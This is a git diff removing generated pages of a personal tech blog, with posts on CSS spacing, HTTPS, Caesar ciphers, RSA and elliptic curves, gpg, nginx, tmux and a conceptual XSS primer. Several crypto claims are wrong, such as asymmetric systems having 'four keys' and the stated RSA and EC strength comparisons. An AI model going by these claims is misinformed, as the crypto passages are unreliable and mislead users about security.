Many people have expressed confusion over how padding and margins work in HTML/CSS. I have been one of those people. In this short article I will explain what the differences are between the two, and how it may affect the functionality of your site.
-
-
Here is an image from the World Wide Web Consortium (W3C) who sets the standards for the web.
-
-
-
-
Now although this image shows all the different types of spacing as equal, the majority of the time these will mostly be padding (inner) and margin (outer). Padding is the inner space between the element and its border; margin is the outer space between two different elements.
-
-
Within the margin the user is unable to press any links or execute any javascript code. It is empty space. If each <link> on your navigation bar has 10 pixels of margin, then there would be 20 pixels in between each <link> that would not be clickable by the user.
-
-
If you have <link>s on your navigation bar with padding set to 20 pixels, however, then there will be 20 pixels on each side of the <link> text where the user is able to click.
-
-
If that part is confusing, try thinking about it in terms of whether background-color would apply.
-
-
-
-
-
Attribute
-
Padding
-
Margin
-
-
-
-
-
Spacing
-
within element
-
between elements
-
-
-
background-color applies
-
Yes
-
No
-
-
-
-
-
In summary:
-
-
Padding: the space within a tag which is still part of the same tag. background-color applies.
-
Margin: the space in between two seperate tags. background-color does not apply; it is empty space.
-
Border: the space in between the two; it surrounds the padding, but is not the margin. It looks nice somtimes, but it has no non-visual function. background-color does not apply.
-
-
-
I hope this covers the basics of margin and padding! Happy coding!
What is the most embarassing thing you have typed into Google search? What is the most personal secret you told a friend in confidence? What is your bank password? What is your business’s secret to stay ahead of the competition?
-
-
Now at first these questions may seem not completely related. There is a point though: You likely sent all of this information over the internet.
-
-
When you send that messege to your friend or business partner, why is it that any person can’t just listen to the signals coming from your phone or laptop and know what you sent to your friend or colleague? The answer: encryption.
-
-
First, some background about internet privacy. You can’t have a conversation about internet encryption and privacy without discussing the man himself:
-
-
Snowden
-
-
Edward Joseph Snowden is an ex-NSA, ex-CIA employee who felt the United State’s 4th Ammendment was being violated by their programs of msas survailence.
-Snowden was raised a staunch establishmentarian conservative; his girlfriend Lisndey however, slowly started changing his mind. Snowden became very influenced by the ideology of populism.
-His populist thinking is shown very clearly when he explains his reasoning for his disclosure of humongous troves of NSA documents.
-
-
-
“My sole motive is to inform the public as to that which is done in their name and that which is done against them.”
-—Edward Snowden
-
-
-
Snowden’s first set of leaks went public in The Gaurdian, The New York Times, and ProPublica in late 2013;
-people started to realize that their governments and internet service providers (ISPs) are listening. People understood there might be more sinister motives than “national security” at play.
-
-
Personally, I have seen a lot of non-tech-savy individuals using security-conscious software when I am helping them fix a problem.
-In fact, there was one time I saw a collage student from rural Alberta who had a VPN running on her phone. This impressed me!
-
-
Encryption on The Web
-
-
The type of encryption used on the web is called: HyperText Transfer Protocol–Secure (HTTPS).
-This kind of encryption stops two things from happening: A) it stops the information you are sending and recieving online from being seen by easvesdroppers and criminals, and B) stops those same third-parties from tampering with the data.
-
-
Without HTTPS it is possible for sombody to listen in and change the data being sent between you and a server.
-
-
Only in recent years has HTTPS become near-universal across the web. It is used even on the simplest sites these days: this one included. After 2013, people became weary of government, criminal, and ISP interference with their web traffic.
-This can be backed up by statistics:
-The level of encrypted web traffic around the time of the Snowden leaks was around 30 percent. It was mostly used by banks, email providers, government, and journalists.
-At the turn of the 2020s however, this has risen to nearly 90 percent among U.S. users of Firefox.
-Japan lags slightly behind with 80 percent encrypted traffic.
This is just the data we know of. You can disable the telemetry settings in Firefox, and it is very likely that hardcore privacy advocates would disable this data collection, so perhaps the amount of encrypted web traffic is slightly higher.
-
-
What about RSA?
-
-
RSA is an encryption method named after the initials of the inventors’ sir names: Ron Rivest, Adi Shamir, and Leonard Adleman. It uses the mathematical “factoring problem” to secure communication. The details of this specific type of encryption will be discussed in an article soon to come.
There are many kinds of encryption used in our everyday communication. Online and offline, over the internet and in person. In this article, I will explain the basics of how encryption should work in theory. I explain in this article why encryption is important, and why you should care about it.
-
-
We will start by looking at in-person, offline encryption.
-
-
Cryptography We Do Everyday
-
We encrypt things all the time without even thinking about it.
-If you spend a significant amount of time with the same group of friends, you will tend to develop common codes that may not make sense to others outside the group.
-For example: for years, my family called sombody falling from a sitting position “doing a Don”. There is a story of course—We knew a guy named Don who fell from his plastic beach chair in a rather hilarious way; “doing a Don” was born.
-
-
These types of minor dialects in speech are cryptographic in their own way. The truth is though, that we use cryptography much more than that!
-
-
-
“Is cryptography any different than talking?
-We say something other than what we mean, and then expect everyone is able to decipher the true meaning behind the words.
-Only, I never do…” — Adapted from a scene in The Imitation Game (p. 39-40)
-
-
-
How many times have you hinted, flirted, and innuendoed to try to say “I find you very physically attractive”?
-Have you told your friend that always stinks to wear more deodorant?
-Have you ever had someone say the words “I’m fine” when you know for certain that they are indeed not okay?
-
-
-
-
-
Words Said
-
Meaning
-
-
-
-
-
What can you do?
-
I don’t want to talk about this anymore.
-
-
-
I don’t want to overstay my welcome.
-
I want to go home now.
-
-
-
I don’t like them and don’t know why.
-
They threaten my ego.
-
-
-
Creepy
-
Unattractive and friendly
-
-
-
-
-
All of these scenarios are perfect examples of lies encryption! If we have the key to these codes, we can start to understand what people really mean.
-Hopefully I have convinced you that you use deceit cryptography on a regular basis in your life, so let us consider what a basic encryption method might be:
-
-
Grade-School Encryption
-
Back when I was in middle school I used to pass notes like these:
-
-
-
-
- The kind of message I would have sent in middle school. A ROT5 Ceasar cipher.
-
-
-
This is a message encrypted using the Caesar cipher. This encryption technique was used by Julius Caesar during the reign of the Roman Empire to “encrypt messages of military significance.”[1]
-This is one of the oldest and simplest methods of encryption known to us today.
-
-
-
-
- A diagram of a ROT13 Ceasar shift algorithm. A <-> N, B <-> O, et cetera.
-
-
-
-
You can try this out yourself by moving some letters forward in the alphabet.
-An ‘A’ turns into a ‘B’, ‘B’ into ‘C’, ‘C’ into ‘D’, et cetera.
-In this case, “Hello!” would become “Ifmmp!”
-That is just using a shift of one. You can use a shift of seven, for example, and then you would shift letters like so:
-
-
-
A -> +7 -> H
-
Q -> +7 -> X
-
T -> +7 -> A
-
-
-
When you reach the end of the alphabet, wrap around to the beginning to find the encrypted letter.
-
-
Example of a Caesar Cipher
-
Let’s setup a little story to illustrate the problems of encryption. We will have three characters:
-
-
-
Alice, young lady with feelings for Bob
-
Bob, a young lad with an addiction to pancakes
-
Eve, a wee jealous girl scout who sits between Bob and Alice
-
-
-
Alice really likes Bob and wants to tell Bob her feelings, so she writes “I love you, Bob! Please eat healthier!” on a sticky note.
-She passes it to Eve, so Eve can pass it to Alice’s love interest.
-However, in an unfortunate turn of events Eve reads the note herself, and decides not to give it to Bob.
-
-
Oh the horror! Alice is without young love! How could she remedy this so that Bob can read her message, but evil Eve can not?
-Let’s use the Caesar cipher to fix this problem.
-
-
Let us assume that Alice and Bob already have a shared key, 7 for example. To encrypt this message, she should shift her letters seven letters forward in the alphabet—just like the example above.
-
-
-
-
- A longer Ceasar cipher encrypted message using ROT2.
-
-
-
-
Now, when Alice sends her Romeo a little note, all he has to do is decrypt the text by shifting the letters down by 7.
-Here is a site which can do longer pieces of text for you instead of doing it manually.
-
-
Problems
-
-
Before the two love-birds start smooching on the branch of a big pine tree in the schoolyard, perhaps we should consider some problems with the Ceasar cipher.
-
-
It is Very Easy to Break
-
-
Even Eve with her measly grade 4 math skills could easily start going through this message with pen and paper and figure out any combination in a couple hours at maximum.
-Imagine how easy this is for a computer?
-This could be broken in a few microseconds even on an older processor like the Intel Core 2 Duo.
-
-
No Secure Way of Sharing Keys
-
-
We assumed in our previous example that Bob and Alice already have a shared key (seven) to encrypt and decrypt all of their messages.
-If Bob and Alice did not have a previous friendship and time to share secrets of this sort, there is no way to share their key with eachother without Eve also knowing.
-This would defeat the entire purpose of obscuring the message in the first place.
-
-
Universal Vulnerability of Messages
-
-
Every message sent between the two parties uses the same code to encrypt and decrypt. If someone finds out the code once, all previous communications are comprimised.
-
-
Better Encryption Methods
-
-
To combat the issues with easily breakable, shared-key cryptography, we can turn to the beautiful beast that is Asymetric Cryptography.
-I will discuss this more in another article, but for the technically inclined:
-
-
-
RSA/EC provides very large cryptographic keys. It would be impossible for a human to encrypt or decrypt a message manually.
-
Asymetric cryptography provides four keys, instead of just one; stopping evesdroppers from listening in on your secret conversations—even if you do not have the chance to exchange keys in advance.
Previously, we talked about how symetric encryption works. This is by having a shared key that both parties use to simultaniously encrypt, and decrypt the data. (See Ceasar Cipher for example).
-
-
Public-key, or Asymetric Encryption
-
-
Asymetric encryption is based on the idea of having multiple keys instead of only one shared key.
-For example: instead of encrypting with one key, and decrypting with that same key (like our ROT ciphers we talked about previously), we can use one key to encrypt the information, and a different key to decrypt the information.
-
-
-
-
- Alice sending her message to Bob using Bob's public key. Bob decrypts the message with his private key.
-
-
-
-
In the picture above, see how Alice uses Bob’s public key to encrypt some data,
-then sends it to Bob for him to decrypt with his private key?
-That is the essense of public-key encryption.
-
-
The great thing about public-key encryption is that your public key is public! There is no need to be afraid of sending this everywhere!
-You can attach it at the end of all your emails, the end of your forum posts, a link to it on your low-power webserver (wink).
-There are even things called keyservers that will save your public key on them for retrival in case somebody wants to verify your public key.
-
-
Anything encrypted with your public key can only be decrypted with your private key.
-Provided you never, NEVER share your private key with anyone ever, we can assume that all messages sent to you encrypted with your public key will never be read by anyone else.
-
-
Asymetric encryption, however, often contains four keys instead of two. Why is this?
-
-
Verification of Author
-
-
One interesting thing about keys pairs is that not only can the private key decrypt anything the public key encrypts,
-but the public key can decrypt anything the private key encrypts.
-
-
Now why would one want to encrypt a message that can be decrypted by anyone?
-
-
-
-
- Alice sending a message to bob which is 'signed' with her private key. This allows Bob to know only Alice could have sent it!
-
-
- Note: Although the picture shows otherwise, the text is not sent in the plain. It is encrypted with Alice's private key.
-
-
-
-
This is how you can verify that the person who says they wrote the message really did indeed write the message!
-If their private key was never shared with anyone else, then the message must have come from them!
-
-
For maximum security, these methods are often layered.
-First, signing with the sender’s private key,
-ensuring only they could have sent it—
-then encrypted with the recipient’s pulbic key,
-making sure only the reciever can read it.
-
-
Note that both sides must first have eachother’s public keys to do this.
-This is easy if they communicate often, but when first contacting somebody,
-people will generally send their encrypted message along with the their own pulbic key attached in a seperate file.
-
-
What This Means
-
-
Notice neither Alice nor Bob had to share any comprimsing information over the network?
-This is why public-key encryption is so powerful!
-
-
Alice and Bob can both safely send their public keys in the open.
-They can even send them over the insecure HTTP, or FTP protocols.
-
-
Whilst not sending any encryption-breaking messages,
-Alice and Bob now have a way to communicate securely.
-If you trust nothing and no one, this is your perfered method of security.
The two biggest “implementations” of public-key cryptography vary only in the mathamatical equations used to generate the numbers,
-and how the numbers are “trapdoored” to decrypt if you have the correct key.
-
-
I will discuss the differences in approach here.
-If you want to skip to the next article where I show you how to encrypt your own documents using RSA, see this link.
-
-
RSA
-
-
The mathamatic center of the RSA system was developed over the course of a year or so.
-Three men were involved. Ron Rivest, Adi Shamir, and Leonard Aldeman.
-They worked as a kind of “team”: Each idea by Rivest and Shamir were critisized by the mathamatician on their team: Mr. Aldeman.
-
-
One night, after consuming
-“liberal quantities of Manischewitz wine”
-Rivest had trouble sleeping.
-After taking long gazes into the abyss of his math textbook, he came up with an idea which would change cryptography forever.
-By the next morning, an academic mathamatical paper was nearly finished.
-He named it after himself and the two others that had been helping him along this whole time. Rivest, Shamir, Aldeman.
-
-
Key sizes of RSA range from 1024-bit to 4096-bit.
-1024-bit keys are considered somewhat insecure.
-However,
-it should be noted that every bit doubles the complexity of the key,
-so 2048 is 2^1024 times more complex than 1024.
-
-
Eliptic-Curve (EC)
-
-
Eliptic-Curve (EC) is a family of algorithms that use the Eliptic curve mathamatical structure to generate the numbers for the keys.
-EC can effectivly provide the security of an RSA key one order of magnitude larger than an RSA key.
-
-
-
-
- An eliptic curve structure.
-
-
-
-
It’s fast; it’s secure! Perfect right?
-
-
Of course not!
-
-
One problem is that due to the smaller key size,
-it can more easily be broken by brute-force.
-This is why EC is mostly used for temporary communication (like HTTPS), not permenant communication (like having an encrypted email conversation with a journalist).
-
-
The other problem is that a certain EC algrorithm called P-256 is suspected to be introduced with malice to National Institute of Standards and Technology (NIST)
-by the NSA.
-Supposedly, the NSA is able to crack anything encrypted with this algorithm.
-I will let the experts argure about that.
-
-
Other well-known EC algorithms that are more-or-less trusted as secure do exist though.
-The premeire one being Curve25519.
-The reference implementation of this algrorithm is also public-domain,
-so it is easy for devlopers to work into their own applications without worrying about copywrite.
-
-
Conslusion
-
-
In this article we went over some basic points:
-
-
-
Public-key encryption enables secure communication over insecure networks.
-
RSA is considered the standard for extra-seure communication.
-
EC is a newer, faster, more transient encryption method.
-
-
diff --git a/_site/2020/04/06/rsa4/index.html b/_site/2020/04/06/rsa4/index.html
deleted file mode 100644
index 92bc511..0000000
--- a/_site/2020/04/06/rsa4/index.html
+++ /dev/null
@@ -1,392 +0,0 @@
-
-
-
-
- How To Encrypt Your Own Documents Using gpg | tait.tech
-
-
-
-
-
-
-
-
-
-
tait.tech
-
-
-
-
-
-
-
-
How To Encrypt Your Own Documents Using gpg
-
-
-
-
-
If you have ever wanted to garuntee the utmost security of your emails and documents, then this is the guide for you!
-It should be noted that in some circles the tools used are more common than in others.
-These are the everyday tools of many privacy advocates and computer nerds.
-
-
If you have never used Linux however, then the method of doing this will be rather unfamiliar.
-This tutorial will be done on an Arch Linux machine,
-but it should be the same on Ubuntu, Fedora, CentOS, Debian,
-OpenBSD, FreeBSD, MacOSX, etc.
-The only operating system that does not include these tools by default (or easily accessible) is Windows.
-
-
This tutorial makes heavy use of the terminal.
-You have been warned.
-
-
Let us…begin!
-
-
Glossary
-
-
-
ASCII armour — A way to encode OpenPGP documents so they are readable by humans. These files end in .asc
-
(Open)PGP — An open standard for encoding pulbic keys and encrypted documents.
-
GPG — GNUPrivacyGaurd is an implementation of OpenPGP. It is installed by default on most Linux distrobutions.
-
-
-
Step 0: Setup
-
-
We will be using the utility gpg for this tutorial.
-
-
The other thing to note: The character ‘$’ (dollar sign) is usually not typed when shown in a command.
-It simply indicates that you do not need administrative privilages to run these commands.
-
-
Test to see if you get this output in your terminal.
-
-
-$ gpg --version
-
-gpg (GnuPG) 2.2.20
-libgcrypt 1.8.5
-Copyright (C) 2020 Free Software Foundation, Inc.
-License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>
-
-...
-
-
-
If this is not successful look into how to install these tools on your system.
-
-
Step 1: Get/Create A Public Key!
-
-
Get Somebody Else’s
-
Step one is having somebody to send your encrypted message to. Maybe this is a friend, a journalist, or a whistleblower.
-
-
To encrypt a document with somebody’s public key, you need to first obtain it.
-My public key is available at this link, and you can use it to send me encrypted stuff.
-
-
If you are on a linux terminal, you can use the curl or wget command to download it.
The following section is quite long,
-so if you don’t want to create your own keypair,
-then feel free to skip to Step #2.
-
-
If you want to encrypt your own documents,
-or you want others to be able to send you encrypted messages,
-then you can create your own public/private key pair.
-You can use these to encrypt your documents,
-and you can send our public key to others so that they can securely communicate with yourself.
-
-
Run the following command in your terminal, and follow the steps I outline to get you started.
-
-
-$ gpg --full-gen-key
-
-
-
This will produce the following dialog:
-
-
-gpg (GnuPG) 2.2.20; Copyright (C) 2020 Free Software Foundation, Inc.
-This is free software: you are free to change and redistribute it.
-There is NO WARRANTY, to the extent permitted by law.
-
-Please select what kind of key you want:
- (1) RSA and RSA (default)
- (2) DSA and Elgamal
- (3) DSA (sign only)
- (4) RSA (sign only)
- (14) Existing key from card
-Your selection?
-
-
-
Select the option 1. You want two keys, both RSA.
-
-
Next we will select the key size:
-
-RSA keys may be between 1024 and 4096 bits long.
-What keysize do you want? (2048)
-
-
-
Type the number 2048.
-
-
Next it will ask you how long you want the key to be valid.
-
-
-Requested keysize is 2048 bits
-Please specify how long the key should be valid.
- 0 = key does not expire
- <n> = key expires in n days
- <n>w = key expires in n weeks
- <n>m = key expires in n months
- <n>y = key expires in n years
-Key is valid for? (0)
-
-
-
Type the number 1. This will enable you time to test it,
-but it will make the key expire within 24 hours so that if you accidentally
-share your private key, or delete your VM and no longer have access to it, you will be fine.
-
-
It will ask your if you are sure about the expiry date.
-
-
-Key expires at Tue Apr 7 02:24:23 2020 UTC
-Is this correct? (y/N)
-
-
-
Type y to confirm your choice.
-
-
Now gpg is going to ask you to create a user id to indetify this key.
-Use some test data for now.
-User input is in bold, feel free to follow along or to put your own test data in.
-
-
Once you are more comfortable with the tools,
-then you can create a public/private keypair that you will keep for some time.
-
-
-GnuPG needs to construct a user ID to identify your key.
-
-Real name: Mr. Tester
-Email address: test@test.org
-Comment: for testing only
-You selected this USER-ID:
- "Mr. Tester (for testing only) <test@test.org>"
-
-Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
-
-
-
It will then ask you for a password.
-If you are simply using this for test purposes,
-then you can feel free to set it to something like “test”.
-When create a long-term use pulbic key make sure to make the password very secure.
-
-
During the process of creating your key, gpg may warn you with this message:
-
-
-We need to generate a lot of random bytes. It is a good idea to perform
-some other action (type on the keyboard, move the mouse, utilize the
-disks) during the prime generation; this gives the random number
-generator a better chance to gain enough entropy.
-
-
-
If this happens, feel free to smash your keyboard (lightly),
-watch a YouTube video on the machine,
-browse the web with w3m,
-etc. until the key is generated.
-
-
You will know it is done when you see this message (or something similar):
-
-
-gpg: key EACCC490291EA7CE marked as ultimately trusted
-gpg: revocation certificate stored as '/home/tait/.config/gnupg/openpgp-revocs.d/FFA7D7525C6546983F1152D8EACCC490291EA7CE.rev'
-public and secret key created and signed.
-
-pub rsa2048 2020-04-06 [SC] [expires: 2020-04-07]
- FFA7D7525C6546983F1152D8EACCC490291EA7CE
- uid Mr. Tester (for testing only) <test@test.org>
- sub rsa2048 2020-04-06 [E] [expires: 2020-04-07]
-
-
-
Tada! You have your own public/private keypair!
-
-
Sharing a keypair that will expire soon is not a good idea,
-however, if you are ready, then you can use this command to generate a public key file to share with others.
-
-
Feel free to substitute “Mr. Tester” for any other identifying part of your key.
-Remember that to use the email, you must enclose it in < and >.
This list of keys that gpg keeps on tap so to speak, is called our “keyring”.
-Your will need to import a new public key to encrypt files with gpg.
-
-
If you already created your own public key, then this step is not necessary unless you want to also encrypt something for me :)
-
-
-
-
- A keyring holding eight allen keys.
-
-
-
-
To import a public key to use for encrypting files, use the --import option of gpg. Like so:
-
-
-$ gpg --import public-key.asc
-gpg: key 64FB4E386953BEAD: public key "Tait Hoyem <tait.hoyem@protonmail.com>" imported
-gpg: Total number processed: 1
-gpg: imported: 1
-
-
-
Now that we have imported a public key, we can make a message to send!
-
-
Step 3: Have A Message To Encrypt
-
-
You can make a new file which holds some important, secret data.
-Feel free to use a graphical editor if you have one, if not, nano works alright too.
-
-
- Rules Of A Good Life:
-
- 1. Wash your hands!
- 2. Work hard!
- 3. Be firm.
- 5. Have good friends!
-
-
-
Save this file as something like test-pgp.txt, and we’ll use that name later.
-
-
Step 4: Encrypt A Message
-
-
Now that we have a message to send and person to send to,
-all we have to do is encrypt this message and it’ll be on its merry way!
-To do so, we must specify two new options to gpg.
-
-
The first is --recipient.
-This tells gpg to encrypt using a certin public key that we have in our keyring.
-You can use the person’s name, email address, or the key’s uid.
-
-
The second is --encrypt.
-
-
You will also specify the --armour option to use ASCII armoured files. Put this option after --encrypt, and put the file name after --armour. See below.
-
-
You can either use your own public key name to encrypt a document (allowng only you to decrypt it),
-or you can use my public key that we imported earlier (allowing only me to decrypt it).
-Either way works fine.
If you created your own public/private keypair in step 1,
-and you encryped using --recipient "Your Test Name",
-then you can decrypt your document as well!
-
-
You will need to specify --decrypt, and that’s all folks!
-
-
-$ gpg --decrypt test-gpg.txt.asc
-
-
-
A password dialog will then come up asking for your previously created password.
-As long as you remember your password from before and enter it correctly: voila!
-
-
-gpg: encrypted with 4096-bit RSA key, ID 6989B986FCBE4225, created 2020-01-02
- "Tait Hoyem <tait.hoyem@protonmail.com>"
-Rules Of A Good Life:
-
-1. Wash your hands!
-2. Work hard!
-3. Be firm.
-5. Have good friends!
-
-
-
Step 6: Finale!
-
-
Ladies and gentleman, you have done it!
-You have encrypted our very own document.
-(And maybe even decrypted it yourself too :)
-
-
If you encrypted using my public key,
-feel free to send it to my email.
-I am happy to verify if it worked.
-
-
For more information on this subject, check out gnugp.org’s guide on using GPG.
-They are the ones that make these tools available,
-and the GNU Project has been instrumental in creating the open-source world as it exists today.
-Give ‘em some love, eh!
-
-
Thank you so much for sticking through this whole thing!
-Let me know if there is anything that doesn’t make sense.
-I am happy to improve this guide as time goes on if that is necessary.
I want to build a NAS server to store a bunch of data on. Current problem is lack of a computer to accept multiple SATA connections.
-
-
Problem 1: SATA connectors
-
-
This can be solved by an HBE card. Although they tend to be quite expensive (250+).
-One decent model that isn’t that much is the LSI 9211-8I.
-This is ideal for future expansion.
-
-
A cheaper option is a PCIe multi-SATA connector like this.
-
-
Either work, but one is cheaper and the other is more expandable.
-The 9211-8I uses two SAS ports, which can be expanded indefinetely. SAS supports splitting.
-SATA can be connected in a 4:1 ratio to SAS connectors with some cheap cables.
-
-
Problem 2: Drives
-
I do not have enough drives to make this work right now.
-For the setup I want it would require 5 or 6 drives.
-I will get 4-5 drives worth of space as one drive worth of space is dedicated to “parity”, making you able to:
-
-
-
Verify data integrity. If anything goes wrong with a write, it will be fixed automatically.
-
If one drive dies, the system can stay online with no problem. Two drives and I’m eff-you-see-kay-ed-dee.
-
-
-
My other option is to use two drives worth of space for partiy.
-This would only have me 3-4 drives of space, but
-this system can withstand the failure of two drives.
-
-
Problem 3: Computer System
-
-
I currently have 5 computers.
-
-
-
Celery Stick. An old grey HP laptop with a Braille stickered keyboard. Does not work right now; bad thermal paste job.
-
A Dell laptop lent to me by my school during my studies.
-
Houston. A 21-inch 2011 iMac for which the screen does not work under Linux (excep with the nomodeset kernel option enabled).
-
An Old Toshiba laptop (circa 2010) that I got for $50 to test with OpenBSD (works….sometimes).
-
Main Rig. My main laptop is an ASUS-705 TUF gaming laptop.
-
-
-
None of these have PCIe expansion slots with a case that can handle the new drives.
-
-
I think it’s reasonable to say that for hard-drives and low-end tower PCs,
-I will likely have luck on a place like Kijiji (Canadian Craigslist).
-
-
The search continues :)
-
-
I’m in for a fun ride…. and a few monnies.
-
-
-
-
-
-
-
-
-
diff --git a/_site/2020/04/21/rfi/index.html b/_site/2020/04/21/rfi/index.html
deleted file mode 100644
index bdf0900..0000000
--- a/_site/2020/04/21/rfi/index.html
+++ /dev/null
@@ -1,68 +0,0 @@
-
-
-
-
- rfi: A Simple Linux utility to get a random file from a directory | tait.tech
-
-
-
-
-
-
-
-
-
-
tait.tech
-
-
-
-
-
-
-
-
rfi: A Simple Linux utility to get a random file from a directory
This program gets a random file from your current directory
-if you do not specify one;
-it gets a random file from the specified directory if you give it one like so:
-
-
-# rfi /etc/wireguard
-
-
-
Which is very useful if you want to start a random VPN configuration :)
I found a cross-site scripting (XSS) attack
-in a well-known quiz hosting website.
-I disclosed the vulnerability to them years ago, so I thought
-now might be a good time to write about it.
-
-
In this first article I will explain what XSS is.
-
-
In the next article I will explain how I found this attack.
-
-
What is cross-site scripting (XSS)
-
-
Cross-site scripting, XSS for short,
-is a technique to execute arbitrary Javascript code on a user visiting a website
-by linking to Javascript code stored on another server.
-
-
So for example:
-
-
I have a file on my website called hacked.js.
-If I was able to run this javascript file on anybody visiting a certain website that is not mine, this would be called cross-site scripting.
-
-
Click the above hacked.js link to view the code I use to “hack” this website.
-It’s safe, I promise ;)
-
-
Now, how can we get this code to execute when a user visits this site?
-To explain, I will start with some of the underlying technologies.
-
-
Escape Characters!
-
-
No, this is not a Sherlock Holmes novel!
-
-
If we suppose that a website is built with sequences like these (called “tags”):
-<body>, <p> (for paragraph), <link> and <b> for bold,
-then why can you see the left and right angle bracket characters?
-Don’t they mean something? Shouldn’t they be telling the browser:
-“Hey! Make me bold!”?
-Why doesn’t everything after me typing <b> turn bold?
-
-
The answer is:
-
-
There are special characters in HTML to type a visible left (<)
-and visible right angle bracket (>) in a website.
-If I use the left and right brackets on my keyboard however,
-things will indeed show up bold.
-
-
This is the code for the sentence I wrote above:
-
-There are special characters in HTML to type a visible left (<)
-and visible right angle bracket (>) in a website.
-If I use the left and right brackets on my keyboard however,
-things will indeed <b>show up bold</b>.
-
-
-
Notice how all visible left angle brackets use an < to show them?
-
-
These are called escape characters.
-They tell a system, in this case your web browser:
-“Hello! Please show me off! I don’t want to be hidden.”
-
-
Sanitization
-
-
Most of the time XSS attacks are done using poorly sanitized HTML <input> elements.
-
-
Sanitization is when a program (usually on the server side),
-will remove characters like < and replace them with the aforementioned “escape characters”.
-Internally this would be something like <,
-but they would show up to a user as <.
-
-
When inputs are not properly sanitized and the input is shown to the user in another part of the website,
-then a malicous user can type in HTML that will run whenever anybody tries to look at what they typed.
-For example: a name for a quiz website (input) and the leaderboard for said quiz (display).
-
-
HTML, by itself is not very dangerous.
-The worst thing you could do is probably put a link on your name,
-and then point it to a porn site.
-Make your name bold, italic. Maybe make the background a funny color.
-Although this may annoy your victim it is not dangerous security wise.
-
-
There is one tag however, that is scary…
-
-
<script>
-
-
The <script> tag allows you to write code that can:
-
-
-
Change the page contents.
-
Redirect the user to a new page automatically.
-
Get a user’s location.
-
Open a user’s microphone/webcam.
-
With the srcattribute you can also load a script from another site. (This is XSS)
-
-
-
Those last two will ask for permission from the user (if their browser isn’t insanely insecure).
-
-
In my next article I’ll talk about a website I found which is vulnerable to this attack.
-And, show you how you can run your own XSS attack.
-
-
-
-
-
-
-
-
-
-
diff --git a/_site/2020/05/01/nginx-socket-io-projects/index.html b/_site/2020/05/01/nginx-socket-io-projects/index.html
deleted file mode 100644
index 6824ba4..0000000
--- a/_site/2020/05/01/nginx-socket-io-projects/index.html
+++ /dev/null
@@ -1,109 +0,0 @@
-
-
-
-
- How to use NGINX as a reverse-proxy server for a Node.js application using socket.io | tait.tech
-
-
-
-
-
-
-
-
-
-
tait.tech
-
-
-
-
-
-
-
-
How to use NGINX as a reverse-proxy server for a Node.js application using socket.io
-
-
-
-
-
Despite the long name of the article, I have a feeling this may apply to more people than I might think.
-If you have a Node.js application which needs socket.io connections that you want to pass throgh nginx’s reverse_proxy directive then this is the article for you!
-
-
You must seperate the socket.io sockets and the static resources.
-
-
-
The socket connections can be routed through the default $host/socket.io if you want to ease modifications to the source code.
-
The connections to your main npm Node.js application can be routed through the relevant directory.
-
-
-
Here is the relevant part of my projects.tait.tech.conf file:
For this application,
-I needed the /ttrpg directory to connect to my main Node.js instance. This was going to be the root of a ttrpg project.
-It was to have static files served form my Node.js application.
-
-
I also needed /socket.io to conenct to my running npm instance.
-When I tried to route all the traffic through the /trrpg location directive
-I had no luck whatsoever;
-$host/ttrpg/socket.io/* calls always failed with a 404.
-
-
Having two seperate blocks forwarding in different ways seems to fix this.
-I am not knowledgable enough to understand how.
-
-
For now, the project is alive!!!
-
-
Happy hacking!
-
-
P.S. I forgot to mention I also symbolically linked the socket.io.js file (that node is supposed to serve automatically) to the static client dir.
-For some reson the node instance would not serve this file without that.
It will be licensed under the BSD-3 license, meaning it can be used for any reason—even commercially and without source-code disclosure—without prior authorization, but it must acknowledge that I helped build the end product.
-
-
Once the project is live, it will be located at: Lame Games (currently a dead link).
I updated the site with some easier to identify information about me and my projects :)
-
-
Also, Clue has been delayed due to my partner in crime on the project wokring too many hours.
-
-
I also posted a new project called Caesar Cipher in C. It will be an intermediate example of how to use build systems like make.
-
-
-
-
-
-
-
-
-
-
diff --git a/_site/2020/06/25/tmux-minecraft/index.html b/_site/2020/06/25/tmux-minecraft/index.html
deleted file mode 100644
index 77372a1..0000000
--- a/_site/2020/06/25/tmux-minecraft/index.html
+++ /dev/null
@@ -1,182 +0,0 @@
-
-
-
-
- How to use tmux to send and receive things from your Minecraft server | tait.tech
-
-
-
-
-
-
-
-
-
-
tait.tech
-
-
-
-
-
-
-
-
How to use tmux to send and receive things from your Minecraft server
-
-
-
-
-
So recently I had problem.
-I run a Minecraft server on a big Linux computer I have running in my room.
-Now, as a system administrator it is very helpful to be able to run some simple commands without needing to login with my key, password, TFA, etc.
-It is, frankly, a lot of work.
-Especially when I really just want to be playing games but I just need to check something quickly.
-
-
So for simple things like finding out of the network, CPU, memory or disk usage is my bottleneck, I wrote this really nifty script to connect the world of Minecraft and the Linux shell.
If you want some of the implementation details, stick around.
-
-
Solution
-
-
So to solve this interesting problem, I decided to use tmux.
-tmux is a tterminal multiplexer.
-This allows you to run a terminal session, then detach fromc it while it still runs in the background.
-
-
This is very valuable when running command line applications that need to have an active console connection, like a Minecraft server.
-
-
So first I looked at the tmux command send-keys.
-
-
send-keys
-
-
send-keys allows you to send text, and key presses to a tmux session.
-Now assuming this tmux session is attached to a Minecraft server,
-there is no reason you could not run a command like this:
-
-
-$ tmux send-keys "tell @a This is a Test" Enter
-
-
-
This will send the text “tell @a This is a Test” to the Minecraft server.
-Then, it will hit the newline character, this will execute the command.
-
-
So now we can send information to the server and have it tell the users something.
-
-
But how do we get information about who is typing what in the Minecraft chat?
-
-
tmux’s capture-pane is painful
-
-
So in the manual page for tmux I can see a section recorded below for options I can give to the capture-pane subcommand.
-
-
- -S and -E specify the starting and ending line numbers,
- zero is the first line of the visible pane and negative
- numbers are lines in the history. ‘-’ to -S is the start
- of the history and to -E the end of the visible pane. The
- default is to capture only the visible contents of the pane.
-
-
-
What it seems to be saying is I can start at line -S n and end at line -E n.
-Negative numbers start from the bottom, so in theory I can do the following: tmux capture-pane -S -1 should capture only the last line, because I’m starting from the last line. Right?
-
-
No. It just doesn’t work. Negative numbers do not work with the tmux capture-pane subcommand.
-
-
So I did some simple UNIX piping, like so, to get just the last thing in the chat.
So now we have a way to get the username of someone typing in the Minecraft server chat.
-We have a way to find out what they said.
-And, we have a way to respond.
-
-
You can imagine how these might go together for your own use case.
-
-
Conclusion
-
-
This shows some pretty fun stuff you can do with a few simple Linux commands and a Minecraft server.
-
-
I hope you learned something and found my explanations not horrific haha!
“When given a choice between independence and dependence, always choose independence; you will never regret that choice!”—Luke Smith
-
-
-
